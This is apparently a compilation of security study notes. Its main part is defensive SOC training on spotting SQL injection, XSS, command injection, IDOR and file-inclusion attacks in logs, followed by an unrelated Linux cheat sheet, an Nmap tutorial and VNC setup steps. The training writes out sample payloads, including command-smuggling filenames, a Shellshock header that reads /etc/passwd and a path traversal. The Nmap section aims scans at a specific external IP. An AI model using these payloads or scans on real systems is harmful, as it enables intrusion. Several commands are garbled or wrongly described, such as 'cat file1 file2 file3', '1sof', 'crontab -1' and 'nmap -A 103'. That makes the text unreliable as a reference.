Attackers use many automated devices to detect SQL Injection vulnerabilities. One of the most well known is Sqlmap. Let’s look at the wider picture instead of focusing on a specific tool.

You may use the methods listed below to detect SQL Injection devices:

1. Look at the User-Agent: Automated browser devices generally have their names and versions recorded. You can look at the User-Agent to detect these automated devices.
2. Check the frequency of requests: Automated devices were designed to send an estimated amount of many requests per second to be able to test payloads as quickly as possible. A normal user could send 1 request per second, so you can tell if the requests are made by an automated device or not by looking at the number of requests per second.
3. Look at the contents of the payload: Automated devices usually record their own names in their payloads. For example a SQL Injection payload sent by an automated device could look like this: sqlmap’ OR 1=1
4. Is the payload complicated: This detection method may not always work but based on my experience, I could say that automated devices send more complicated payloads.

Detection Example

We have access logs of a web application that was victim to a SQL Injection attack.

You may not have heard what an access log is before. In short, these are the web server’s access logs. These logs usually contain the source IP address, date, requested URL, HTTP method, user-agent and HTTP Response code. These logs are very useful in investigations.

(SQL Injection Access Logs)

We have an access log in hand. Now what do we do?

Firstly, when we look at the pages that were requested we see that besides pages like “info.php” which is fairly readable, there are also requests made for pages that are complex and have symbols like %. We cannot say that requests for pages like these are malicious but the fact that they are made repetitively and many times is suspicious.

First of all, let’s talk about what the % symbols mean. When we request a page that contains special characters, these requests are not directly transferred to the web server. Instead, our browsers perform a URL encoding (Percent Encoding) of the special characters and replaces each special character with a character string that begins with % and has 2 hexadecimal characters in it. So the pages containing the % symbol above are pages that contain special characters.

Now that we understand what the % symbols mean, let’s revisit the access logs. When we look at the requests, we can easily see that besides the % symbols there are readable words such as “UNION”, “SELECT”, “AND”, “CHR”. Because these are specific words that belong to SQL, we can determine that we are face to face with a SQL Injection attack.

To save our eyes, let’s make the examination a little easier :) You can conduct a search using the keywords “Online URL Decoder” to find web applications that will automatically do the URL decoding for you. In order to read these access logs easier I will get help from these web applications, by doing so I won’t have to strain my eyes or yours.

Let me add a little note. It is not wise to upload something like an access logs which contain critical information on a 3rd party web application. The access logs I uploaded were prepared specifically for this training so there is no problem in my doing so. But you shouldn’t make such mistakes in your professional life.

When we do the URL decoding we can more clearly see that this is a SQL Injection attack. So what should we do now? Yes, we have confirmed that it is a SQL Injection attack but do we leave it there?

Of course not. Now we are going to find any other pieces of information that we can from these access logs.

First, let’s look at the request dates. All the SQL Injection payloads were sent on “19/Feb/2022 11:09:24”. We can see that more than 50 requests were made in 1 second. The fact that so many requests were made in such a short time shows us that this is an automatized attack. Additionally, as we have mentioned before, when attackers perform manual tests they choose to test easy payloads first. But when we look at the access logs we see that the payloads are very complicated. This goes to show that the attack may very well be automated.

We have confirmed that a SQL Injection attack has been performed and that it has been performed with an automated device. So we can end our analysis, right?

There is one more step left to do. We need to determine whether the attack was successful or not. You can determine whether a SQL Injection attack has been successful by looking at the response but in your professional career you will almost never have access to the response. We can presume that all responses will be about the same size because the attack is performed on the same page and over the “id” variable. We can estimate the success of the attack by looking at the size of the response.

Unfortunately, the basic web server that was developed to serve as an example cannot supply a reliable response size. Therefore, we cannot estimate if the attack has been successful looking at this example. But with web servers that have been configured correctly, we can find the response size within the access logs. You can examine this area to determine whether there is a notable difference in response sizes. If there is a notable difference you can estimate that the attack has been successful. But in this situation it would be best to escalate this alert to a higher-tier analyst.

What we know:

1. There has been a SQL Injection attack performed on the “id” parameter on the web application’s main page.
2. The requests came from the IP address: 192.168.31.174.
3. Because there have been 50+ requests per second, this attack has been performed by an automated vulnerability scanning tool.
4. The complex nature of the payloads supports the claim in # 3.
5. We cannot determine whether the response was successful or not because we do not have any information about the response size.

Detecting Cross Site Scripting (XSS) Attacks

What is Cross Site Scripting (XSS)?

Cross Site Scripting (XSS), is a type of injection based web security vulnerability that is included in legitimate web applications and enables malicious code to be run.

Today most frameworks that are used to develop web applications have taken preventative measures against cross-site scripting attacks. But we still frequently see XSS vulnerabilities today because frameworks are sometimes not used, or the framework itself has an XSS vulnerability and the data coming from the user is not sanitized.

XSS Types

There are 3 different types of XSS. These are:

1. Reflected XSS (Non-Persistent): It is a non-persistent XSS type that the XSS payload must contain in the request. It is the most common type of XSS.
2. Stored XSS (Persistent): It is a type of XSS where the attacker can permanently upload the XSS payload to the web application. Compared to other types, the most dangerous type of XSS is Stored XSS.
3. DOM Based XSS: DOM Based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. (OWASP)

How XSS Works?

Just like other web attack methods, XSS is a security vulnerability that happens due to the lack of data sanitization. XSS vulnerability occurs when the data received from the user is sent in the response without sanitizing.

Let’s follow an example to better understand XSS attacks.

Let’s look at the piece of code above. What it does is actually very basic. It merely displays whatever is entered in the ‘user’ parameter. If we enter “LetsDefend” as the ‘user’ parameter, we will see the words “Hello LetsDefend”.

Up till now, there is no problem. If we enter the appropriate data in the user parameter, we are greeted with a warm salutation. But, as we have seen above, there is no control mechanism for the user parameter. This means that whatever we enter in the “user” parameter will be included in the HTTP Response that we receive back.

So,what would happen if we didn’t enter a normal value but instead we entered a payload that would summon a pop-up?

Payload: <script>alert(1)</script>

Because whatever we enter in the “user” parameter is directly included in the HTTP Response, the javascript code we wrote worked and a pop-up window appeared on the screen.

So, this is exactly how XSS works. Because the value entered by the user is not confirmed, the attacker may enter whatever javascript code he likes and get the result he wants. What if the attacker wants to redirect the user to a malicious site?

Payload: <script>window.location=’https://google.com’</script>

https://letsdefend.io/xss_example.php?user=%3Cscript%3Ewindow.location=%27https://google.com%27%3C/script%3E

Of course we are not going to direct you to a web application. Directing you to Google will be sufficient as an example. When the user clicks on the URL he will be directed to Google instead of the perfect LetsDefend web application.

How Attackers Leverage with XSS Attacks

Because XSS is a client-based attack method, it may seem less important than other attack methods but XSS attacks and their impact should not be taken for granted.

Attackers can do the following with an XSS attack:

• Steal a user’s session information
• Initiate processes that a user can
• Capture credentials

…and other various functions.

How to Prevent a XSS Vulnerability

• Sanitize data coming from a user: Never trust data coming from a user. If user data needs to be processed and saved it should be encoded with html encoding using special characters and only then should it be saved.
• Use a framework: Most frameworks come with preventive measures against XSS attacks.
• Use the framework correctly: Almost all frameworks used to develop web applications come with a sanitation feature but if this is not used properly there still is a chance for XSS vulnerabilities to occur.
• Keep your framework up to date: Frameworks are developed by humans so they too may contain XSS vulnerabilities. But these kinds of vulnerabilities are usually patched by security updates. So you should make sure that you have completed your framework’s security updates.

Detecting XSS Attacks

Like we mentioned in the previous article, according to a study done by Acunetix, 75% of cyber attacks are performed over web applications. Because XSS is one of the most frequently tested vulnerabilities, you will be seeing a lot of these during your career as a SOC analyst.

• Look for keywords: The easiest way to catch XSS attacks is to look for keywords such as “alert” and “script” which are commonly used in XSS payloads.
• Familiarize yourself with frequently used XSS payloads: Attackers primarily use the same payloads to look for vulnerabilities before they exploit a XSS vulnerability. This is why familiarizing yourself with frequently used XSS payloads would make it easier for you to detect XSS vulnerabilities. You can examine some frequently used payloads here.
• Check if any special characters have been used: Check data coming from a user to see if any special characters that are frequently used in XSS payloads like greater than (>) or lesser than (<) are present.

Example of a Detection

In this example, we see access logs from an Apache server with Wordpress. Don’t forget to revisit our article on “Detecting SQL Injection Attacks” for more information about access logs.

Now, let’s examine the access logs that have been provided.

Firstly, let’s take a general look at the requests that have been made and try to understand them. We see that all the requests have been made for the “/blog/” page and that only the “s” parameter values have been changed. If you pay attention to the URLs of the web pages you visit, you would have noticed that when you perform a search in Wordpress, the words you enter are sent using the “?s=” parameter. The example we are looking at shows us that these are searches performed in Wordpress.

It is hard to find easily readable examples like the example in the “Detecting SQL Injection Attacks” article. Instead, we find characters that have transformed into %XX as a result of URL encoding. We will perform URL decoding next but first let’s take a look at the URLs and try to see if we can recognize any words.

When we look at the logs, we notice javascript related words such as “script”, “prompt”, and “console.log”. When we see javascript it immediately brings XSS to mind. If we do a URL decoding we will easily be able to understand the requests that are made.

When we take another look at the access logs after performing a URL decoding we clearly see the XSS payloads. We can definitely say that the Wordpress application which we got these access logs from has become the victim of a XSS attack.

When we look at the requested IP addresses, we see there are more than one. Are more than one attackers trying to perform a XSS attack simultaneously? Or is the attacker constantly changing his IP address to avoid being blocked by security products such as firewalls and IPS? If you check the IP address you will see that it belongs to Cloudflare. Because the Wordpress application has been put behind Cloudflare, it is quite normal that Cloudflare is making the request.

When we examine the dates of the requests, we find that there was a request made every 3–4 seconds. It is not really possible for a human to try to enter this many XSS payloads in such a short time but you may not be able to be sure that the number of requests made per second is excessive. We are lucky because we have the User-Agent information in this example. If we examine this information we see that it belongs to a urllib library. This shows us that these requests were made through an automated vulnerability scanner tool.

So was the attack successful?

We cannot say anything definite because we don’t have access to the responses.

As a result of our examinations:

1. It is determined that the attack targeted the web application where the access logs came from.
2. After looking at the amount of requests and the User-Agent information we determined that the attack was performed by an automated vulnerability scanner.
3. Because the application is behind Cloudflare the source IP addresses were not found.
4. We do not know whether the attack was successful or not.

Detecting Command Injection Attacks

What are Command Injection Attacks?

Command Injection Attacks are attacks that happen when the data received from a user is not sanitized and is directly transmitted to the operating system shell.

Attackers exploit command injection vulnerabilities to directly execute commands on the operating system. The fact that the attacker’s priority is to take control of the system makes these vulnerabilities more critical than other vulnerabilities.

Because the command that the attacker sends will be using the rights of the web application user, a misconfigured web application would grant the attacker access with admin rights.

How Command Injection Works?

Command injection vulnerabilities happen when the data received from the user is not sanitized. Let’s examine command injection vulnerabilities with an example.

Let’s say we have a basic web application that copies the user’s file in the “/tmp” folder. The web application’s code is below.

Under normal conditions the application will work normally if used accurately. For example if we load a file named “letsdefend.txt” it will successfully copy the file to the “/tmp” folder.

So, what will happen if we upload a file named “letsdefend;ls;.txt”? The command would become:

Command: cp letsdefend;ls;.txt

“;” signifies that the command has ended. So when we look at the payload above, there are three different commands that the operating system executes. These are:

1. cp letsdefend
2. ls
3. .txt

The first command is for the copying process but if the parameters are not entered correctly it will not work correctly.

Command #2 is the directory listing command the attacker wants to execute. The user does not receive the command output so the attacker cannot see the files in the directory but the operating system successfully executes the command.

When the operating system wants to execute command number 3 there will be an error message because there is no “.txt” command.

As you see, the code has been executed in the web server’s operating system. So, what if the attacker uploads a file named ““letsdefend;shutdown;.txt”? The operating system would shut itself down, and the web application will not be able to function.

The attacker can create a reverse shell in the operating system with the help of the accurate payload.

How Attackers Leverage with Command Injection Attacks

Attackers can execute commands on an operating system by exploiting command injection vulnerabilities. This means that the web application and all other components on the server are at risk.

How to Prevent Command Injection

• Always sanitize data received from a user: Never trust data received from a user. Not even a file name!
• Limit user rights: Adjust web application user rights to a lower level whenever possible. Hardly any web application requires the user to have admin rights.
• Make use of virtualization technologies such as dockers

Detecting Command Injection Attacks

I think we all understand the criticality level of Command Injection vulnerability very well. If such a critical vulnerability is exploited and gone undetected the company involved may lose a great amount of money and reputation.

So, how can we detect Command Injection Attacks?

There is more than one way. These are:

• When examining a web request look at all the areas: The command injection vulnerability may be located in various areas depending on the operation of the web application. This is why you should check all areas of the web request.
• Look for keywords related to the terminal language: Check the data received from the user for keywords that are related to terminal commands such as: dir, ls, cp, cat, type, etc.
• Familiarize yourself with frequently used Command Injection payloads: When attackers detect a command injection vulnerability they usually create a reverse shell in order to work more easily. This is why knowing frequently used Command Injection payloads will make it easier to detect a command injection attack .

Detection Example

In this example we will not be looking at access logs, rather we will be examining a HTTP Request.

GET / HTTP/1.1

Host: yourcompany.com

User-Agent: () { :;}; echo “NS:” $(</etc/passwd)

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

If we look at the HTTP Request above, we see that the main page of the web application yourcompany[.]com has been requested.

But when we look at the HTTP Request Headers we see a suspicious situation in the User-Agent header. There is a bash command in the User-Agent header whereas there should be browser/operating system information here.

Actually, this request was captured during the exploitation of a vulnerability named Shellshock. Shellshock is a security weakness that was published in 2014 and had great effects.

Shellshock is a security vulnerability that originates from bash somehow involuntarily executing Environment Variables. Shellshock is a great example of a command injection attack.

When the bash command which is located within User-Agent is executed, the “/etc/passwd” file’s contents will be returned to the attacker in the HTTP Response header as “NS”.

Detecting Insecure Direct Object Reference (IDOR) Attacks

What is IDOR?

Insecure Direct Object Reference (IDOR), is a vulnerability caused by the lack of an authorization mechanism or because it is not used properly. It enables a person to access an object that belongs to another.

Among the highest web application vulnerability security risks published in the 2021 OWASP, IDOR or “Broken Access Control” takes first place.

How IDOR Works

IDOR is not a security vulnerability caused by unsanitary conditions like other web application based security vulnerabilities. The attacker manipulates the parameters sent to the web application, gains access to an object that doesn’t belong to himself and is able to read, change or erase the contents.

Here’s an example to better understand how the IDOR vulnerability is exploited.

Let’s imagine a basic web application. It retrieves the “id” variable from the user, then it displays data that belongs to the user who made the request.

URL: https://letsdefend.io/get_user_information?id=1

When a request is made in our web application, like the one above, it displays the information of the user with an id value of 1.

If I am the user who made the request and my id value is 1 everything will work normally. When I make the request I will see my personal information.

But what happens if we make a request with 2 as the “id” parameter? Or 3?

If the web application is not controlling: “Does the “id” value in the request belong to the person making the request?” then anyone can make this request and see my personal information.This web vulnerability is called IDOR.

Attackers can reach objects that do not belong to themselves by changing parameters like the “id”. What kind of information they can gain access to may change according to the web application but either way you wouldn’t want anyone to access your personal information, right?

How Attackers Leverage with IDOR Attacks

What an attacker can do is limited by the area of an IDOR vulnerability. But the most common areas they are seen are usually pages where a user’s information is received. If an attacker exploits an IDOR vulnerability he could:

• Steal personal information
• Access unauthorized documents
• Conduct unauthorized processes (For example: deletion, alteration)

How to Prevent IDOR

In order to establish a secure environment without an IDOR vulnerability you should always check if the person who made the request has any authority.

On top of this, unnecessary parameters should be removed and only the least amount of parameters should be taken away from the user. If we think about the previous example, we don’t need to get the “id” parameter. Instead of getting the “id” parameter from user, we can identify the person who made the request using the session information.

Detecting IDOR Attacks

IDOR attacks are more difficult to detect than other attacks. Because it does not have certain payloads such as SQL Injection and XSS.

Having the HTTP Response at hand would help to identify IDOR attacks. But HTTP Responses are not logged for various reasons and thus it is harder to identify IDOR attacks.

There are a couple of methods used in identifying IDOR attacks. These are:

• Check all parameters: an IDOR vulnerability may occur in any parameter. This is why you should not forget to check all parameters.
• Look at the amount of requests made for the same page: When attackers detect an IDOR vulnerability they also want to access the information related to all other users so they usually perform a brute force attack. This is why you may see many requests made for the same page from one source.
• Try to find a pattern: Attackers will plan a brute force attack to reach all objects. Because they will perform the attack on successive and foreseeable values like integer values you can try to find a pattern in these requests. For example: if you see requests such as id=1, id=2, id=3, you may suspect something.

Detection Example

Below you can see a screen image of logs found on a web server running Wordpress.

As in our other examples, let’s start with a general, broad based examination. Because there are no special characters included in the requests that were made we can easily read the logs.

If you have used the Wordpress application before you might know that the “wp-admin/user-edit.php?user_id=” page contains information about registered Wordpress users. It could be seen as normal to be able to access this page, in fact if you have more than one user you may be gaining access with more than one “user_id: parameter. But it is not normal to have this many different “user_id” parameters.

It looks like we have an IDOR attack on our hands.

When we look at what the source IP was we see it belongs to Cloudflare. This means that the web application that we received the access log for was using a Cloudflare service. This is why the requests were transmitted to the web application through Cloudflare.

We see 15–16 requests within the short time frame that access logs are recorded and this shows us that the attack is performed with an automated device. If we look at the User-Agent header we can see it says “wfuzz/3.1.0”. Wfuzz is a device that is frequently used by attackers. We did not only determine that this attack was performed by an automated scanner tool, we also determined that it was performed by a tool named Wfuzz.

But we still haven’t answered the most important question. Has the attack been successful?

Was the attacker able to gain access to the users’ information?

Our job would be easier if we had the HTTP Responses. Because we don’t have the HTTP Responses let’s look at the response size in the Access Logs and make an inference.

Like we mentioned before, the requested page was displaying user information. Information such as the users’ names, last names and usernames’ total size will not be the same. This is why we can ignore requests with a response size of 479 bytes.

If we look at the requests with a response size of 5691 and 5692, we see that the response code will be 302 (redirect). Successful web requests will generally be answered with the response code 200. So we can say that the attack was not successful. But this information alone may not be sufficient to determine the attack as unsuccessful.

There are 10 requests with the response size of 5692 and 4 with the response size of 5691.

Like we stated before, there is a very low possibility for the total of all information like the user’s name, last name, username to be equal. This strengthens the possibility that the attack was not successful.

Detecting RFI & LFI Attacks

What is Local File Inclusion (LFI)?

Local File Inclusion (LFI), is the security vulnerability that occurs when a file is included without sanitizing the data obtained from a user. It differs from RFI because the file that is intended to be included is on the same web server that the web application is hosted on.

Attackers can read sensitive files on the web server, they can see the files that contain passwords that would enable them to reach the server remotely.

What is Remote File Inclusion (RFI)?

Remote File Inclusion (RFI), is the security vulnerability that occurs when a file is included without sanitizing the data obtained from a user. It differs from LFI in that the file that is intended to be included is hosted on a different server.

The attackers host malicious codes on their prepared server and they invite the victim website over the remote server and try to get it to execute.

How LFI & RFI Works?

Just like most web application based vulnerabilities, LFI and RFI also have vulnerabilities caused by not sanitizing data received from a user.

SQL Injection vulnerabilities occur when data received from a user is entered in SQL queries; Command Injection vulnerabilities happen when data received from a user is executed directly in the system shell; IDOR vulnerabilities occur when data received from a user is used to directly access objects. RFI and LFI vulnerabilities are caused by the use of data received from a user directly in the system or to include a file on a remote server.

Why would data received from a user be used to include a file? Web applications have become highly complicated and unfortunately each feature that is developed is used for malicious purposes. The language option found in web applications is used in order to include files based on data received from a user.

If we examine the piece of code in the image above, we see that the desired website language is selected by using the “language” parameter received from the user.

In a normal situation the web application will work as planned. For example if “en” is entered as the “language” parameter we will receive the file seen below.

“website/en/home.php”

But if an attacker enters the payload seen below into the “language” parameter then unfortunately the web application will display the “/etc/passwd” file to the user.

Payload: /../../../../../../../../../etc/passwd%00

“website//../../../../../../../../../etc/passwd%00/home.php

“../” is used to go to the parent directory. Because the attacker does not know what directory the web application is in, he tries hard to reach the “root” directory using “../”. Later, he names the “/etc/passwd” file and enables the inclusion of the file within the web application. “%0” is used to end the string. This way, the remaining “/home.php” string is not read by the web application.

How Attackers Leverage with RFI & LFI

• Code execution
• Sensitive information disclosure
• Denial of service

How to Prevent LFI & RFI

The most effective way to prevent RFI and LFI attacks is to sanitize any data received from a user before using it. Do not forget that client based controls are easily bypassed. This is why you should always do your controls on both the client-side and the server-side.

Detecting LFI & RFI Attacks

We previously mentioned what attackers can accomplish with RFI and LFI attacks. Because a company can experience a great deal of loss due to the exploitation of such vulnerabilities we should be able to detect such attacks and take precautions.

How can we detect and prevent LFI and RFI attacks?

• When examining a web request from a user, examine all the fields.
• Check for any special characters: Within the data that is received from users, especially look for notations such as ‘/’, `.`, `\`.
• Familiarize yourself with files frequently used in LFI attacks: In an LFI attack the attacker reads the files that are on the server. If you familiarize yourself with the critical file names on the server, you can detect LFI attacks more easily.
• Search for acronyms such as HTTP and HTTPS: In RFI attacks the attacker includes the file on his own device and enables the file to execute.
• In order to include a file, attackers usually set up a small web server on their own device and display the file over an HTTP protocol. This is why you should search for notations such as “http” and “https” to be able to detect RFI attacks more easily.

1.File Operation:

~ls : lists of all files and directories in the present working directory

~ls -R : lists files in sub-directories also

~ls -a : Shows hidden files

~ls al : Lists files and directories with detailed information like permissions, size, owner, etc.

~ cd directoryname : Changes the directory

~cd : Moves one level up

~ pwd : Displays the present working directory

~ touchfilename : Creates a new file

~cat filename : Displays the file content

~ cat file1 file2 file3 : Joins two files (file1 and file2) and stores the output in a new file (file3)

~touch filename : Creates or modifies a file

~rm filename : Deletes a file

~cp source destination : Copies files from the source path to the destination path

~ mv source destination : Moves files from the source path to the destination path

~find / -name filename : Finds a file or a directory by its name starting from

~root file filename : Determines the file type

~less filename : Views the file content page by page

~ head filename : Views the first ten lines of a file

~tail filename : Views the last ten lines of a file

~1sof : Shows which files are opened by which process.

~du -h — max-depth=1 : Shows the size of each directory. Use — max-depth=1 to limit the output to the current directory and its immediate children.

~fdisk : Disk partition manipulation command.

2. Directory Operations:

~ mkdir directoryname: Creates a new directory in the present working directory

~rmdir directoryname: Deletes a directory

~cp -r source destination: Copies directories recursively

~mv olddir newdir: Renames directories

~find-type d-name directoryname: Finds a directory starting from root

3. Process Operations:

~ps: Displays your currently active processes.

~top: Displays all running processes

~kill pid: Kills the process with given pid

~pkill name: Kills the process with the given name

~ bg: Resumes suspended jobs without bringing them to foreground

~fg: Brings the most recent job to foreground

~fg n: Brings job n to the foreground renice

~+n [pid]: Change the priority of a running process.

~&>filename: Redirects both the stdout and the stderr to the file filename.

~1>filename: Redirect the stdout to file filename.

~2>filename: Redirect stderr to file filename

4. File Permissions:

~chmod octal filename: Change the permissions of file to octal, which can be between 0 (no permissions) to 7 (full permissions)

~chown ownername filename: Change file owner

~chgrp groupname filename: Change group owner

5.Networking:

~ping host: Ping a host and outputs results

~ whois domain: Get whois information for domain

~dig domain: Get DNS information for domain

~ netstat -pnltu: Display various network related information such as network connections, routing tables, interface statistics etc.

~ifconfig: Displays IP addresses of all network interfaces

~ssh user@host: Remote login into the host as user

~scp: Transfers files between hosts over ssh

~ wget url: Download files from the web

~curl url: Sends a request to a URL and returns the response

~traceroute domain: Prints the route that a packet takes to reach the domain.

~ mtr domain: mtr combines the functionality of the traceroute and ping programs in a single network diagnostic tool.

~ss: Another utility to investigate sockets. It’s a more modern alternative to netstat.

~nmap: Network exploration tool and security scanner.

6. Archives and Compression:

~tar cf file.tar files: Create a tar named file. tar containing files

~tar xf file.tar: Extract the files from file.tar

~ gzip file: Compresses file and renames it to file.gz

~ gzip d file.gz: Decompresses file.gz back to file

~zip -r file.zip files: Create a zip archive named file.zip

~unzip file.zip: Extract the contents of a zip file

7. Text Processing:

~grep pattern files:Search for pattern in files

~ grep -r pattern dir: Search recursively for pattern in dir

~command | grep pattern: Pipe the output of command to grep for searching

~echo ‘text’: Prints text

~sed ‘s/string/string2/g’ filename: Replaces string1 with string2 in filename

~diff file1 file2: Compares two files and shows the differences

~wc filename: Count lines, words, and characters in a file

~awk: A versatile programming language for working on files

~ sed -i ‘s/string1/string2/g’ filename: Replace string1 with string2 in filename. The -i option edits the file in-place.

~cut -d’: -f1 /etc/passwd: Cut out the first field of each line in /etc/passwd, using colon as a field delimiter

8. Disk Usage:

~df: Shows disk usage

~ du: Shows directory space usage

~ free: Show memory and swap usage

~whereis app: Show possible locations of app

9. System Info:

~date: Show the current date and time

~cal: Show this month’s calendar

~uptime: Show current uptime

~w: Display who is online.

~whoami: Who you are logged in as

~uname -a: Show kernel information

~df -h: Disk usage in human readable format

~du -sh: Disk usage of current directory in human readable format

~ free -m: Show free and used memory in MB

10. Package Installations:

~sudo apt-get update: Updates package lists for upgrades

~sudo apt-get upgrade: Upgrades all upgradable packages

~sudo apt-get install pkgname: Install pkgname

~sudo apt-get remove pkgname: Removes pkgname

11. Others (mostly used in scripts):

~command1 command2: Run command1 and then command2

~command1 && command2: Run command2 if command1 is successful

~command1 || command2: Run command2 if command1 is not successful

~command &: Run command in background

12. Version Control (Git commands):

~ git init: Initialize a local git repository

~ git clone url: Create a local copy of a remote repository

~git add filename: Add a file to the staging area

~git commit -m “Commit message”: Commit changes with a message

~ git status: Check the status of the working directory

~git pull: Pull latest changes from the remote repository

~git push: Push changes to the remote repository

~git branch: List all local branches

~git branch branchname: Create a new branch

~git checkout branchname: Switch to a branch

~git merge branchname: Merge a branch into the active branch

~git stash: Stash changes in a dirty working directory

~git stash apply: Apply changes from a stash

~git log: View commit history

~git reset: Reset your HEAD pointer to a previous commit

~git rm filename: Remove a file from version control

~git rebase: Reapply commits on top of another base tip.

~git revert: Create a new commit that undoes all of the changes made in a particular commit, then apply it to the current branch.

~git cherry-pick commitID: Apply the changes introduced by some existing commits.

13. Environment Variables:

~env: Display all environment variables

~echo $VARIABLE: Display the value of an environment variable

~export VARIABLE=value: Set the value of an environment variable

~alias new_command=”old_command options: Create a new command that executes the old command with the specified options.

~echo $PATH: Print the PATH environment variable.

~export PATH=$PATH:/new/path: Add /new/path to the PATH.

14. Job Scheduling (Cron Jobs):

~crontab -1: List all your cron jobs

~crontab -e: Edit your cron jobs

~crontab -r: Remove all your cron jobs

~ crontab -v: Display the last time you edited your cron jobs

~crontab file: Install a cron job from a file

~@reboot command: Schedule a job to run at startup

15. Package Installations (using pip, a Python package installer):

~pip install packagename: Install a Python package.

~pip uninstall packagename: Uninstall a Python package.

~pip freeze > requirements.txt: Freeze the installed packages into a requirements file.

~ pip install -r requirements.txt: Install packages from a requirements file.

16. System Monitoring and Performance:

~iostat: Reports Central Processing Unit (CPU) statistics and input/output statistics for devices, partitions, and network filesystems.

~vmstat: Reports information about processes, memory, paging, block 10, traps, disks, and CPU activity.

~htop: An interactive process viewer for Unix systems. It’s a more user-friendly alternative to top.

17. Search and Find:

~ locate filename: Find a file by its name. The database updated by updatedb command.

~ whereis programname: Locate the binary, source, and manual page files for a command.

~which commandname: Shows the full path of (shell) commands.

18. Compression / Archives:

~ tar -cvf archive.tar dirname/: Create a tar archive.

~tar -xvf archive.tar: Extract a tar archive.

~tar -jcvf archive.tar.bz2 dirname/: Create a compressed bz2 archive.

~tar -jxvf archive.tar.bz2: Extract a bz2 archive.

Nmap is short for Network Mapper. It is an open-source Linux command-line tool that is used to scan IP addresses and ports in a network and to detect installed applications.

Nmap allows network admins to find which devices are running on their network, discover open ports and services, and detect vulnerabilities.

Nmap has become hugely popular, being featured in movies like The Matrix and the popular series Mr. Robot.

Why use Nmap?

There are a number of reasons why security pros prefer Nmap over other scanning tools.

First, Nmap helps you to quickly map out a network without sophisticated commands or configurations. It also supports simple commands (for example, to check if a host is up) and complex scripting through the Nmap scripting engine.

Other features of Nmap include:

• Ability to quickly recognize all the devices including servers, routers, switches, mobile devices, etc on single or multiple networks.
• Helps identify services running on a system including web servers, DNS servers, and other common applications. Nmap can also detect application versions with reasonable accuracy to help detect existing vulnerabilities.
• Nmap can find information about the operating system running on devices. It can provide detailed information like OS versions, making it easier to plan additional approaches during penetration testing.
• During security auditing and vulnerability scanning, you can use Nmap to attack systems using existing scripts from the Nmap Scripting Engine.
• Nmap has a graphical user interface called Zenmap. It helps you develop visual mappings of a network for better usability and reporting.

Basic scans

Scanning the list of active devices on a network is the first step in network mapping. There are two types of scans you can use for that:

• Ping scan — Scans the list of devices up and running on a given subnet.

nmap -sP 103.60.173.170

Scan a single host — Scans a single host for 1000 well-known ports. These ports are the ones used by popular services like SQL, SNTP, apache, and others.

nmap  103.60.173.170 

Stealth scan

Stealth scanning is performed by sending an SYN packet and analyzing the response. If SYN/ACK is received, it means the port is open, and you can open a TCP connection.

However, a stealth scan never completes the 3-way handshake, which makes it hard for the target to determine the scanning system.

sudo nmap 130.60.173.170

You can use the ‘-sS’ command to perform a stealth scan. Remember, stealth scanning is slower and not as aggressive as the other types of scanning, so you might have to wait a while to get a response.

Version scanning

Finding application versions is a crucial part in penetration testing.

It makes your life easier since you can find an existing vulnerability from the Common Vulnerabilities and Exploits (CVE) database for a particular version of the service. You can then use it to attack a machine using an exploitation tool like Metasploit.

nmap -sV 103.60.173.170

To do a version scan, use the ‘-sV’ command. Nmap will provide a list of services with its versions. Do keep in mind that version scans are not always 100% accurate, but it does take you one step closer to successfully getting into a system.

Aggressive Scanning

Nmap has an aggressive mode that enables OS detection, version detection, script scanning, and traceroute. You can use the -A argument to perform an aggressive scan.

nmap -A 103

Aggressive scans provide far better information than regular scans. However, an aggressive scan also sends out more probes, and it is more likely to be detected during security audits.

Scanning Multiple Hosts

Nmap has the capability of scanning multiple hosts simultaneously. This feature comes in real handy when you are managing vast network infrastructure.

You can scan multiple hosts through numerous approaches:

• Write all the IP addresses in a single row to scan all of the hosts at the same time.

nmap 192.164.1.1 192.164.0.2 192.164.0.2

• Use the asterisk (*) to scan all of the subnets at once.

nmap 192.164.1.*

Add commas to separate the addresses endings instead of typing the entire domains.

nmap 192.164.0.1,2,3,4

Use a hyphen to specify a range of IP addresses

nmap 192.164.0.0–255

Conclusion

Nmap is clearly the “Swiss Army Knife” of networking, thanks to its inventory of versatile commands.

It lets you quickly scan and discover essential information about your network, hosts, ports, firewalls, and operating systems.

Nmap has numerous settings, flags, and preferences that help system administrators analyze a network in detail.

On Kali Linux (Host):

1. Install TightVNC Server:

$sudo apt-get update
$sudo apt-get install tightvncserver

2. Start the VNC server :

$tightvncserver

• You’ll be prompted to set a password for VNC access.

3.Configure VNC to Start at Boot (Optional):

$tightvncserver -service install
$tightvncserver -service start

On Windows (Virtual Machine):

1. Download and Install TightVNC Viewer: Download the installer from the official TightVNC website and install it on your Windows virtual machine.

1. Connect to Kali Linux (Host): Open TightVNC Viewer on your Windows machine and enter the IP address of your Kali Linux host, followed by the port number. The default VNC port is 5901, but it can be different if you started the server on a different display. For example

<Kali_IP_Address>:5901

Enter the VNC password you set earlier.

1. Access Kali Linux Desktop: Once connected, you should see the Kali Linux desktop on your Windows machine.

Note:

• Ensure that your Kali Linux firewall allows VNC traffic (port 5901 by default).
• Adjust the resolution and display settings when starting the VNC server if needed.
• Be cautious about security; using VNC over a secure network is recommended, or use SSH tunnels for encryption.
• Always keep your software up to date, including the VNC server and viewer.

Remember, using remote access tools comes with security implications, and it’s crucial to secure your system appropriately, especially when working with penetration testing tools like Kali Linux. Always use such tools responsibly and in accordance with applicable laws and policies.

As we become increasingly connected through the Internet by access through the computer, our phones, and even household devices, security has become a hot topic. Attacks can happen from any corner. What happens if someone gains control of your computer or phone? Or someone gains control of just your Google account?

On an enterprise level, attacks on computer systems can also breach millions of pieces of personal data, including credit card information. Governments are also vulnerable to attacks that expose sensitive data.

Cybersecurity involves everyone and every entity — from you and your neighbors, to organizations, to companies, to governments.

The Internet has completely revolutionized the way we communicate with each other and share information. Many of us spend hours on social media and online group chats. Nearly all institutions have some sort of computer system administration to keep track of accounts, and buying and selling things on the Internet is now the norm. One by one, even medical equipment, transportation systems, and vacuums are connected to the web.

What is Cybersecurity, exactly?

There’s no turning back, even as more connections to the Internet lead to more privacy concerns and security risks. We don’t want strangers to access our accounts, or our credit card numbers. Along with practicing personal security, organizations and businesses also need to do their part to implement the right protections.

